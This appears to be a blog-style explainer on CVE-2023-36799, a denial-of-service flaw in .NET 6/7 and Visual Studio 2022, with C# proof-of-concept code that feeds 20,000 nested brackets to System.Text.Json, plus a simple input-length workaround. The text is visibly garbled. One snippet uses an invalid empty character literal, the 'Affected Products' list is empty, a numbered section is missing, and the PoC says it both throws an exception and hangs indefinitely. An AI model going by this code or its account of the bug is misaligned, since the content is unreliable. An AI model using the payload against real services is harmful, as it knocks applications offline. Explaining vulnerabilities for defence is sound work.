---
Security issues are everywhere in software, and as more apps run on .NET Core, vulnerabilities in this platform can hurt both developers and businesses. In late 2023, Microsoft disclosed CVE-2023-36799, a Denial of Service (DoS) flaw that affects .NET 6/7 and Visual Studio builds using .NET Core components. Below, let’s break down what this bug means, how you can trigger it (with safe code samples), and how to fix it.
1. What is CVE-2023-36799?
CVE-2023-36799 is a Denial of Service vulnerability in certain versions of .NET (6., 7.) and Visual Studio (2022), which can allow an attacker to crash or hang an app or build process just by sending specially crafted input.
Summary:
> *Improper handling of specific requests in .NET Core libraries or Visual Studio compilation tasks lets a remote or local attacker cause resource exhaustion, either by making your app unusable or crashing the build.*
The risk? Apps go offline. Development teams lose productivity.
2. Affected Products
According to Microsoft’s advisory:
Check your installed versions using
dotnet --list-runtimes
And in Visual Studio
Help > About Microsoft Visual Studio
3. How the DoS Works (with Code Example)
The actual details depend on the attack surface, but most reports point to how certain input can cause .NET Core apps to spin into infinite loops or eat up 100% CPU, never returning results.
Example: Triggering Infinite CPU Loop
Suppose your web API deserializes untrusted user input via System.Text.Json. Certain payloads lead to pathological cases trapped by this bug (now patched).
using System.Text.Json;
string badJson = new string('', 20000); // A ridiculous string, like [[[....[[[
try
{
var parsed = JsonSerializer.Deserialize<object>(badJson);
}
catch (Exception ex)
{
Console.WriteLine("Caught exception: " + ex.Message);
}
Another Example
If you're building projects in certain Visual Studio versions, a corrupted or malicious resource file could trigger hangs during the build.
The exploitable weakness comes down to resource handling
- .NET Core: Unsanitized or deeply nested JSON/XML (or similar reproducible input) can hog CPU/memory.
- Visual Studio: Corrupted or unusually large embedded resource files (.resx, for example) or compiler tasks choke, stalling the IDE or the build agent.
Proof-of-Concept (POC) for .NET Core DoS
Disclaimer: Never use in production! Demonstrate in isolated/test environment.
using System;
using System.Text.Json;
class Program
{
static void Main()
{
// An intentionally "evil" input string: 20k nested array brackets
string evilJson = new string('[', 20000);
try
{
var obj = JsonSerializer.Deserialize<object>(evilJson);
Console.WriteLine("Parsed (should not reach here)");
}
catch (Exception e)
{
Console.WriteLine("Error: " + e.Message);
}
}
}
Even with an exception, you'll notice the process hangs for a long time (or possibly never finishes), causing a denial of service.
If this logic is used in a web API or microservice, anyone can POST such payloads to hurt your app.
5. Fixes and Mitigations
Immediate step:
Visual Studio 2022: Upgrade to latest 17.x release after 12 Sep 2023
[Microsoft’s update guide lists all patch links.
Workarounds:
If you can’t patch immediately, add _input size checks_ and _timeout logic_
if (badJson.Length > 2048) // arbitrary max length
throw new InvalidOperationException("Payload too large");
6. Further Reading & References
- Official CVE-2023-36799 Advisory
- .NET Blog Security Update Notices
- GitHub security advisory
7. Conclusion
CVE-2023-36799 is a classic example of a simple bug causing a big production headache. Always watch for security upgrades in your SDKs and don't accept unchecked, deeply nested, or huge input. Patch your .NET and Visual Studio tools today to avoid slowdowns and service crashes.
Timeline
Published on: 09/12/2023 17:15:00 UTC
Last modified on: 09/12/2023 19:38:00 UTC